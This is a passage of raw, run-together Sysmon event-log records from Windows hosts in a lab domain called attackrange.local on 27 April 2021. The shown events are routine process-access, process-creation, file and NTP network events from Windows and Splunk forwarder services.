Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291065Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291064Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291063Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291062Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291061Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291060Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291059Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291058Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291057Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291056Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.461{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-01C6-6088-ED29-00000000BB01}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291055Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.461{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C6-6088-ED29-00000000BB01}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291054Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.457{BEA10069-01C6-6088-ED29-00000000BB01}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291053Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.193{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7277D959B3293180A708797BF2EA4119,SHA256=ECA3011F16CC462F621CDDF802C80E58546B405A0EF41D2508751CDF49D6E58E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291052Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.193{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48FFB206A55924456D5DB2E5012FC4A9,SHA256=AEA0209D27BF1BFF7A2F09D35F4869B9B6AD12317D07A09F8EF6486847908704,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439578Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:26.039{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439577Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:26.039{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439587Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:27.296{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F14D1251D393FDD92EDD432220C32CAD,SHA256=B5AF26AA1054379B29119BAF3B5AC1FE126EBC9594C26A4396B4A66708FD4C48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439586Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:27.295{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D57B9CD8F4E1F2C489EAD039D4D76A6,SHA256=EDD55FDF9EF6E7DFD7B8A5D053180526160251EB205C0ED5FC937BDC373D54AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291069Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:27.496{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2C9BC83AB106AC63F5CA35B5A02AC9E,SHA256=0FD50E1214204D8F3B1C7AF7CF98C868B9D9CE90E7406AE62948E41B5D2B485E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291068Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:27.195{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A21DF715EEC105577A927D8E1D68F68,SHA256=0633B6067CF8152A740EC9A901B35BF815928792624FFB64F754DD2068CB7493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439585Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:27.040{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439584Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:27.040{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439591Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:28.306{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06D66A9BF09BE0BBFEEFF227F5AB8CEB,SHA256=0426705C999CADDEA3D26FFB6307ECC58B43798B6802914E125774186F2B1046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291070Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:28.197{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B99C7BC28A855BA94BFE4A4A1588BF0,SHA256=376A6FF3B9F49EB3C8E998FB502456453786C6438C6A0A8FC099F61434B8FB41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439590Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:24.567{42DC5269-CE99-6086-1100-00000000BA01}340C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-932.attackrange.local123ntpfalse13.86.101.172-123ntp 10341000x8000000000000000439589Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:28.041{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439588Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:28.041{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439594Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:29.317{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59915C3B2F71D1A661AC0B499A1A1319,SHA256=BEDCC5E716FB3056E390FBF6602FA57991C84F98D90E42FA42A75D96DE2D23D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291071Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:29.199{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95BB77FF3CF86F81D4A91F5D1C396DBC,SHA256=5A92CA33103F17E54EB921BB726D9D5F5368033EEC59F800353C75EC5FD5A43E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439593Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:29.042{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439592Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:29.042{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439597Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:30.545{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74F748B8D9D27F6D9DA4B14E14DF53E1,SHA256=88774C890B17BCF354BF404E1120D83BB7A062214519EC8944114FFFF5711BAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291072Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:30.265{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97CF9C1E60539F3F27168D2669A069C2,SHA256=22C1A654782728743961FCF0284226E644C050156D5133CD001541B77EB8A3C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439596Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:30.043{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 